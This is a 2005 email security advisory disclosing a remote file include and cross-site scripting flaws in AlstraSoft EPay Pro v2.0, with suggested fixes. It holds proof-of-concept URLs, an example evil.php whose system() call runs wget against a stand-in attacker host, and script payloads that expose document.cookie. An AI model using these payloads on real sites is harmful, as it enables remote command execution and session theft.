This is a multi-part message in MIME format.

------=_NextPart_000_0012_01C53726.5C0BF6A0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Severity: High
Title: AlstraSoft EPay Pro v2.0 has file include and multiple xss =
vulnerabilities
Date: 02/04/2005

Vendor: AlstraSoft
Vendor Website: http://www.alstrasoft.com
Summary: Alstrasoft epay pro v2. has file include and multiple xss =
vulnerabilities.

Proof of Concept Exploits:=20

http://localhost/epal/index.php?view=3Dhttp://www.whatismyip.com?
File include vulnerability

Instead of www.whatismyip.com if we replaced that with suppose evil.php =
on www.server.com which contained evil code such as
<?
system('wget http://www.hacker.com");
?>
and we ran, =
http://localhost/epal/index.php?view=3Dhttp://www.server.com/evil it =
would execute the command and thus this can lead to arbitary command =
execution.


http://localhost/epal/?order_num=3Dcrap&payment=3D"><script>alert(documen=
t.cookie)</script>&send=3Dfirst&send=3Dregular&send=3Dpriority&send=3Dexp=
ress
Pops cookie


http://localhost/epal/?order_num=3Dcrap&payment=3Dcrap&send=3Dfirst&send=3D=
regular&send=3Dpriority&send=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/=
script%3E
Pops cookie


Possible Fixes: The usage of htmlspeacialchars(), and using a base =
directory for file include would solve these problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author:=20
These vulnerabilties have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for =
my soon to come out book on Secure coding with php.

Diabolic Crab's Security Services: Contact at =
dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web =
application securing services, along with programming in php, vb, asp, =
c, c++, perl, java, html and graphic designing.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQk2p4SZV5e8av/DUEQIWsQCfW213hHs/Bd4QZBoLFufN1NM+AkUAn3Xd
vW9dOgM7AoFDa/JaMgMjaisw
=3Dsb0J
-----END PGP SIGNATURE-----


------=_NextPart_000_0012_01C53726.5C0BF6A0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED =
MESSAGE-----<BR>Hash:=20
SHA1</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR>[Hsc =
Security Group]=20
<A =
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=
BR>[dP=20
Security] <A=20
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A></FONT>=
</DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: AlstraSoft =
EPay Pro v2.0=20
has file include and multiple xss vulnerabilities<BR>Date:=20
02/04/2005</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Vendor: AlstraSoft<BR>Vendor Website: =
<A=20
href=3D"http://www.alstrasoft.com">http://www.alstrasoft.com</A><BR>Summa=
ry:=20
Alstrasoft epay pro v2. has file include and multiple xss=20
vulnerabilities.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits: =
</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"http://localhost/epal/index.php?view=3Dhttp://www.whatismyip.com"=
>http://localhost/epal/index.php?view=3Dhttp://www.whatismyip.com</A>?<BR=
>File=20
include vulnerability</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Instead of <A=20
href=3D"http://www.whatismyip.com">www.whatismyip.com</A> if we replaced =
that with=20
suppose evil.php on <A href=3D"http://www.server.com">www.server.com</A> =
which=20
contained evil code such as<BR>&lt;?<BR>system('wget <A=20
href=3D"http://www.hacker.com">http://www.hacker.com</A>");<BR>?&gt;<BR>a=
nd we=20
ran, <A=20
href=3D"http://localhost/epal/index.php?view=3Dhttp://www.server.com/evil=
">http://localhost/epal/index.php?view=3Dhttp://www.server.com/evil</A>=20
it would execute the command and thus this can lead to arbitary command=20
execution.</FONT></DIV>
<DIV>&nbsp;</DIV><FONT face=3DArial size=3D2>
<DIV><BR><A=20
href=3D'http://localhost/epal/?order_num=3Dcrap&amp;payment=3D"><script>a=
lert(document.cookie)</script>&amp;send=3Dfirst&amp;send=3Dregular&amp;se=
nd=3Dpriority&amp;send=3Dexpress'>http://localhost/epal/?order_num=3Dcrap=
&amp;payment=3D"&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&a=
mp;send=3Dfirst&amp;send=3Dregular&amp;send=3Dpriority&amp;send=3Dexpress=
</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://localhost/epal/?order_num=3Dcrap&amp;payment=3Dcrap&amp;se=
nd=3Dfirst&amp;send=3Dregular&amp;send=3Dpriority&amp;send=3D'%3E%3Cscrip=
t%3Ealert(document.cookie)%3C/script%3E">http://localhost/epal/?order_num=
=3Dcrap&amp;payment=3Dcrap&amp;send=3Dfirst&amp;send=3Dregular&amp;send=3D=
priority&amp;send=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</=
A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>Possible Fixes: The usage of htmlspeacialchars(), and using a =
base=20
directory for file include would solve these problems.</DIV>
<DIV>&nbsp;</DIV>
<DIV>Keep your self updated, Rss feed at: <A=20
href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a=
h</A></DIV>
<DIV>&nbsp;</DIV>
<DIV>Author: <BR>These vulnerabilties have been found and released by =
Diabolic=20
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =
free to=20
contact me regarding these vulnerabilities. You can find me at, <A=20
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =
or <A=20
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A>. =
Lookout for my=20
soon to come out book on Secure coding with php.</DIV>
<DIV>&nbsp;</DIV>
<DIV>Diabolic Crab's Security Services: Contact at=20
dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web=20
application securing services, along with programming in php, vb, asp, =
c, c++,=20
perl, java, html and graphic designing.</DIV>
<DIV>&nbsp;</DIV>
<DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed =
for=20
commercial use: <A href=3D"http://www.pgp.com">www.pgp.com</A></DIV>
<DIV>&nbsp;</DIV>
<DIV>iQA/AwUBQk2p4SZV5e8av/DUEQIWsQCfW213hHs/Bd4QZBoLFufN1NM+AkUAn3Xd<BR>=
vW9dOgM7AoFDa/JaMgMjaisw<BR>=3Dsb0J<BR>-----END=20
PGP SIGNATURE-----<BR></FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV></BODY></HTML>

------=_NextPart_000_0012_01C53726.5C0BF6A0--